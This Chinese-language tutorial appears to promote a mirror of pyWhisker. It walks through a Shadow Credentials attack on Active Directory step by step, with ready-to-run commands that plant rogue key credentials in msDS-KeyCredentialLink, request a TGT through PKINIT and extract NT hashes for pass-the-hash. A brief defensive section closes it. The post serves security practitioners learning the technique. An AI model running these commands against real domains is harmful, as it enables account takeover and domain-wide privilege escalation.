pyWhisker 实战案例:利用 Shadow Credentials 获取域管理员权限
【免费下载链接】pywhiskerPython version of the C# tool for "Shadow Credentials" attacks项目地址: https://gitcode.com/gh_mirrors/py/pywhisker
在现代网络安全攻防中,域渗透技术不断演进,Shadow Credentials 作为一种强大的攻击手段,能够让攻击者在不直接获取用户密码的情况下实现域管理员权限的接管。本文将通过pyWhisker这款 Python 工具,带你一步步掌握 Shadow Credentials 攻击的完整流程,从环境准备到权限获取,全程实战演示!
什么是 Shadow Credentials 攻击?
Shadow Credentials 攻击利用 Windows 域环境中的msDS-KeyCredentialLink属性,通过向目标用户或计算机账户添加伪造的密钥凭据(Key Credential),实现对该账户的完全控制。这种攻击方式无需破解密码,仅通过修改 Active Directory 属性即可完成,隐蔽性极强。
攻击的核心原理
- 属性操纵:修改目标账户的
msDS-KeyCredentialLink属性,植入攻击者控制的密钥凭据 - PKINIT 认证:利用植入的密钥通过 Kerberos PKINIT 协议获取票据(TGT)
- 权限提升:通过票据伪造或哈希提取,最终获取域管理员权限
pyWhisker 作为 Shadow Credentials 攻击的 Python 实现工具,基于 Impacket 和 PyDSInternals 库,支持在 UNIX 系统上完成全套攻击流程。
攻击前置条件
实施 Shadow Credentials 攻击需满足以下条件:
- 目标域功能级别需为Windows Server 2016或更高
- 至少有一台域控制器运行 Windows Server 2016 或更高版本
- 域控制器需配置证书服务(AD CS)或拥有有效的 PKI 环境
- 攻击者需拥有修改目标账户
msDS-KeyCredentialLink属性的权限
⚠️ 注意:若域控制器未配置证书服务,攻击过程中会出现
KDC_ERR_PADATA_TYPE_NOSUPP错误
环境准备与工具安装
安装 pyWhisker
首先克隆项目仓库并安装依赖:
git clone https://gitcode.com/gh_mirrors/py/pywhisker cd pywhisker pip install -r requirements.txt工具基本用法
pyWhisker 支持多种操作模式,核心命令格式如下:
python3 pywhisker.py -d <域> -u <用户名> -p <密码> --target <目标账户> --action <操作类型>主要操作类型包括:
list:列出目标账户的现有密钥凭据add:添加新的密钥凭据remove:删除指定密钥凭据clear:清除所有密钥凭据export:导出密钥凭据为 JSON 文件
实战步骤:从属性操纵到权限获取
步骤 1:列出目标账户的现有凭据
首先使用list操作查看目标账户当前的密钥凭据:
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"图:使用 pyWhisker 列出目标账户的现有密钥凭据信息
步骤 2:添加恶意密钥凭据
使用add操作向目标账户添加新的密钥凭据,支持 PEM 和 PFX 两种格式。以下是 PEM 格式的示例:
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename test2 --export PEM图:添加 PEM 格式的恶意密钥凭据到目标账户
若需要生成 PFX 格式(带密码保护),可使用以下命令:
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename test1 -P "mypassword"图:添加 PFX 格式的恶意密钥凭据到目标账户
步骤 3:导出密钥凭据信息
使用export操作将目标账户的密钥凭据导出为 JSON 文件,便于后续分析和利用:
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "export" --filename credentials.json图:导出目标账户的密钥凭据信息到 JSON 文件
步骤 4:利用 PKINIT 获取 TGT 票据
借助 PKINITtools 工具集,使用添加的密钥凭据请求 TGT 票据:
# PEM 格式示例 python3 PKINITtools/gettgtpkinit.py -cert-pem test2_cert.pem -key-pem test2_priv.pem domain.local/user2 user2.ccache # PFX 格式示例 python3 PKINITtools/gettgtpkinit.py -cert-pfx test1.pfx -pfx-pass "mypassword" domain.local/user2 user2.ccache步骤 5:提取 NT 哈希并获取权限
通过获取的 TGT 票据提取目标账户的 NT 哈希,进而使用 Pass-the-Hash 等技术横向移动:
python3 PKINITtools/getnthash.py -key <从JSON导出的Key> domain.local/user2防御建议
为防范 Shadow Credentials 攻击,建议采取以下措施:
- 限制属性修改权限:严格控制对
msDS-KeyCredentialLink属性的写权限,仅授权必要账户 - 监控属性变更:通过 SIEM 工具监控
msDS-KeyCredentialLink属性的异常修改 - 加强证书管理:确保域控制器证书的安全,定期轮换并审计证书使用情况
- 启用高级审计策略:开启 "目录服务更改" 审计,记录 AD 对象的属性修改事件
总结
Shadow Credentials 攻击作为一种新型的域渗透技术,凭借其隐蔽性和高效性成为攻击者的重要武器。通过 pyWhisker 工具,我们可以清晰地看到攻击的完整链条——从属性操纵到票据获取,再到最终的权限提升。对于防御方而言,理解攻击原理、加强权限控制和监控审计是防范此类攻击的关键。
希望本文能帮助安全从业者更好地理解 Shadow Credentials 攻击,并在实际工作中做好防御准备! 🔒
【免费下载链接】pywhiskerPython version of the C# tool for "Shadow Credentials" attacks项目地址: https://gitcode.com/gh_mirrors/py/pywhisker
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
)
